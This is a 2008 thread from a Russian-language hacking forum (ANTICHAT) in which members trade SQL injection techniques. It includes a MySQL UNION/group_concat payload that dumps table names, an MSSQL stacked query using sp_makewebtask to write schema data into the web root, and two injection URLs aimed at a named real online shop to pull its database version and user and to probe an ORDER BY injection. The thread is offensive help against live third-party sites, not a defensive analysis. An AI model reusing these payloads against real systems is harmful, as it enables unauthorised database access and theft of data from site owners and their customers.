HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 22.12.2008, 23:49
desTiny
Reservists Of Antichat - Level 6
Регистрация: 04.02.2007
Сообщений: 1,152
Провел на форуме:
3008839

Репутация: 1502


По умолчанию

вместо -- пиши /*
это тебе не мсскл

ну и кавычки ещё по-хорошему писать надо
__________________
Bedankt euch dafür bei euch selbst.

H_2(S^3/((z1, z2)~(exp(2pi*i/p)z1, exp(2pi*q*i/p)z2)))=Z/pZ
 
Ответить с цитированием

  #2  
Старый 23.12.2008, 18:00
Ghost0ff
Новичок
Регистрация: 18.11.2008
Сообщений: 28
Провел на форуме:
109973

Репутация: 15
Отправить сообщение для Ghost0ff с помощью ICQ
По умолчанию

В моей практике я такого не замечал. возможно вывести все таблицы которые есть в строчку, то есть если тебе выдает по одному столбцу или колонке не обязательно юзать limit а возможно посмотреть вомандой group_concat Пр: =-1+union+select+1,group_concat(unhex(hex(table_name ))),3+from+information_schema.tables--
выведутся все таблицы в строчку через запятульку. так же и с колонками в таблице. Способ упрощает твою задачу во много раз. Удачи
 
Ответить с цитированием

  #3  
Старый 23.12.2008, 18:05
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678

Репутация: 354
По умолчанию

Ghost0ff
это в mysql,а человек спрашивает за mssql.
Тем более, что group_concat() выводит только первую 1000 знаков (или как то так), если не ошибаюсь. Но все таблицы ты не выведешь.
 
Ответить с цитированием

  #4  
Старый 23.12.2008, 18:29
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

zenon2

LIMIT 1 OFFSET 1
 
Ответить с цитированием

  #5  
Старый 23.12.2008, 18:35
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

а, ступил, это в постгрессе
 
Ответить с цитированием

  #6  
Старый 23.12.2008, 20:05
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717

Репутация: 1980
Отправить сообщение для [Raz0r] с помощью ICQ
По умолчанию

@SHS
'; EXEC sp_makewebtask 'c:\inetpub\wwwroot\out.htm', "SELECT * FROM information_schema.COLUMNS";--

@zenon2
используй способ, который я привел в ссылке. Имхо более подоходящего не найти
 
Ответить с цитированием

  #7  
Старый 23.12.2008, 21:50
F4R
Banned
Регистрация: 20.06.2008
Сообщений: 296
Провел на форуме:
1385078

Репутация: 126
Отправить сообщение для F4R с помощью ICQ
По умолчанию

посмотрите плиз
Цитата:
http://www.mk-computer.ru/catalog.php?cat=1&sort=-1
это скуль?
 
Ответить с цитированием

  #8  
Старый 23.12.2008, 22:22
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

Цитата:
Сообщение от F4R  
посмотрите плиз

это скуль?

Нет,но это скуля

http://www.mk-computer.ru/news.php?detail=-128+union+select+1,2,3,4,5,concat_ws(0x3a3a,versio n(),user(),database()),7--
 
Ответить с цитированием

  #9  
Старый 23.12.2008, 22:37
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию

Цитата:
Сообщение от F4R  
это скуль?
да это скуль после order by
_mk-computer.ru/catalog.php?cat=1&sort=cena*(substring(version(),1 ,1)=4)--+
 
Ответить с цитированием

  #10  
Старый 23.12.2008, 22:12
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию

F4R не совсем но тут может быть скуль
попробуй поподбирай поля!
если не подбираються значит ее нету
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ